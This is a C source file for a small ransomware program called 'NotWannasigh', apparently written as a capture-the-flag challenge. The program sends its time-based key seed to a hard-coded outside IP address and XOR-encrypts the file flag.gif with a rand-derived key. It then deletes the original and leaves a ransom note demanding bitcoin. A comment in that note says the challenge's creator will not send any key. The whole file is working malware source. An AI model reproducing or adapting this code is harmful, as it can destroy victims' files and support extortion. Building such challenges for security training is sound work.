#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main(){
	time_t seconds;
	seconds = time(NULL);
	srand(seconds);

	int socket_desc = socket(AF_INET, SOCK_STREAM, 0);
	if(socket_desc == - 1){
		printf("could not create socket\n"); //some people told me that real malware wouldn't have handy print statements like this. In my experience, I haven't seen it to this degree, but dude script-kiddies have a LOT of unpolished crap in their code
	}else{
		printf("created socket\n");
		struct sockaddr_in server;
		server.sin_addr.s_addr = inet_addr("108.61.127.136");
		server.sin_family = AF_INET;
		server.sin_port = htons(80);
		if(connect(socket_desc, (struct sockaddr *)&server, sizeof(server)) < 0){
			printf("connect error\n");
		}else{
			printf("connected\n");
			char message[10];
			sprintf(message, "%d", seconds);
			if(send(socket_desc, message, 10, 0) < 0){
				printf("send failed\n");
			}else{
				printf("sent\n");
			}
		}
	}

	FILE *flagGifPtr;
	printf("targetting flag.gif\n");
	flagGifPtr = fopen("flag.gif","r+");

	fseek(flagGifPtr, 0, SEEK_END);
	int fileSize = ftell(flagGifPtr);
	fseek(flagGifPtr, 0, SEEK_SET);
	printf("fileSize = %d\n", fileSize);

	unsigned char key[fileSize];
	for(int q = 0; q < fileSize; q++){
		key[q] = rand() % 256;
	}
	printf("key generated by 256\n");

	unsigned char byte;
	unsigned char encryptedBytes[fileSize];
	int index = 0;
	while(((byte=fgetc(flagGifPtr)) != EOF) && (index < fileSize)){
		encryptedBytes[index] = byte ^ key[index];
		index++;
	}

	fclose(flagGifPtr);
	remove("flag.gif");

	FILE *yourFilePtr;
	yourFilePtr = fopen("flag-gif.EnCiPhErEd","w+");
	for(int w = 0; w < fileSize; w++){
		fprintf(yourFilePtr, "%c", encryptedBytes[w]);
	}
	fclose(yourFilePtr);

	FILE *ransomNotePtr;
	ransomNotePtr = fopen("ransomNote.txt","w+");
	fprintf(ransomNotePtr, "Haha! Your precious file flag.gif has been encrypted by my new and improved ransomware NotWannasigh! You must send bitcoin to \"bitpay.com/83768\" to get the decryption key. You should act fast because in 48 hours I will delete the key. Muahahahaha!\n - def-not-h4ckah\n\n(Hi, CTF challenge creator here. You should _NEVER_ pay the ransom. If you send bitcoin to that BTC wallet then you will ONLY be donating to charity (and hey, that's really nice of you, Mental Health Hackers is a great organization). I will NOT send you the decryption key)\n");
	fclose(ransomNotePtr);
}

